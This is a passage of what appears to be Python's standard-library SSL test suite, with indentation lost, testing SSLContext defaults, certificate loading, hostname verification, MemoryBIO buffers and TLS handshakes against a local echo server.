ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
# TODO: fix TLSv1.3 support
ctx.options |= ssl.OP_NO_TLSv1_3
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
# TODO: fix TLSv1.3 support
ctx.options |= ssl.OP_NO_TLSv1_3
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError, OSError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
